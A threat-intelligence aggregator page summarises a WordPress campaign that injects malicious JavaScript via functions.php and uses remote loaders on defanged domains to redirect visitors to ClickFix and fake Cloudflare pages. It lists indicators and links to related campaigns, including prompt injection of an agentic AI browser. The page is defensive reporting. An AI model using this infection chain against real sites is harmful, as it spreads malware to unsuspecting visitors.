Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

WordPress malicious JavaScript redirect campaign

Campaign
First reported
Last updated
Happening score
H score 39
1 unique sources, 1 articles

Summary

Hide ▲

The WordPress compromise campaign is turning site visits into a malware delivery path, redirecting users to ClickFix-style pages and fake Cloudflare verification screens. Attackers injected malicious JavaScript through functions.php and used remote loaders on brazilc[.]com and porsasystem[.]com to serve the payload. The activity matters because it reaches normal visitors through trusted websites and can hand them off to malware pages. It also hides behind legitimate-looking ads and browser-challenge branding to reduce suspicion.

Related Happenings

Venom Stealer MaaS continuous credential theft and exfiltration

Malware Activity
First: 01.04.2026 16:30 Last: 01.04.2026 16:30 Sources 1

About this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...

Open Happening

FAUX#ELEVATE phishing campaign targeting French-speaking corporate environments

Campaign
First: 24.03.2026 18:35 Last: 24.03.2026 18:35 Sources 1

About this happening: The **FAUX#ELEVATE** phishing campaign is actively targeting **French-speaking corporate environments** with **fake resume/CV lures** that deliver malware for **credential theft**...

Open Happening

ClickFix MacSync social-engineering campaign targeting macOS users

Campaign
First: 16.03.2026 13:41 Last: 16.03.2026 13:41 Sources 1

About this happening: A **ClickFix** campaign is using **fake Cloudflare CAPTCHA verification challenges**, **embedded video tutorials**, and **automatic OS detection** to trick victims into pasting an...

Open Happening

Perplexity Comet prompt-injection research shows agentic browsers can be trained into phishing traps

Technical Analysis
First: 11.03.2026 18:38 Last: 11.03.2026 18:38 Sources 1

About this happening: **Perplexity's Comet AI browser** is the focus of a **technical analysis** thread showing how **prompt injection** and **malicious URLs** can steer an agentic browser into **data...

Open Happening

Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims

Campaign
First: 11.03.2026 16:45 Last: 11.03.2026 16:45 Sources 1

About this happening: A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...

Open Happening

Timeline

  1. 08.10.2025 19:43 1 articles · 7mo ago

    Compromised WordPress sites redirect visitors to ClickFix pages

    Exploitation Observed

    Users visiting compromised sites on September 19, 2025 were sent through an infection chain that executed `porsasystem[.]com/6m9x.js`, then `porsasystem[.]com/js.php`, and then directed victims to ClickFix-style pages for malware delivery.

    Show sources
    Open in new tab
  2. 08.10.2025 19:43 2 articles · 7mo ago

    Sucuri analyzes malicious WordPress JavaScript loader

    Technical Analysis Update

    On October 8, 2025, Sucuri investigators found a compromised WordPress site serving suspicious third-party JavaScript after attackers modified `functions.php`; the loader sent HTTP POST requests to `brazilc[.]com`, which returned code that loaded `porsasystem[.]com` and a hidden 1x1 pixel iframe mimicking Cloudflare challenge assets such as `cdn-cgi/challenge-platform/scripts/jsd/main.js` to redirect site visitors.

    Show sources
    Open in new tab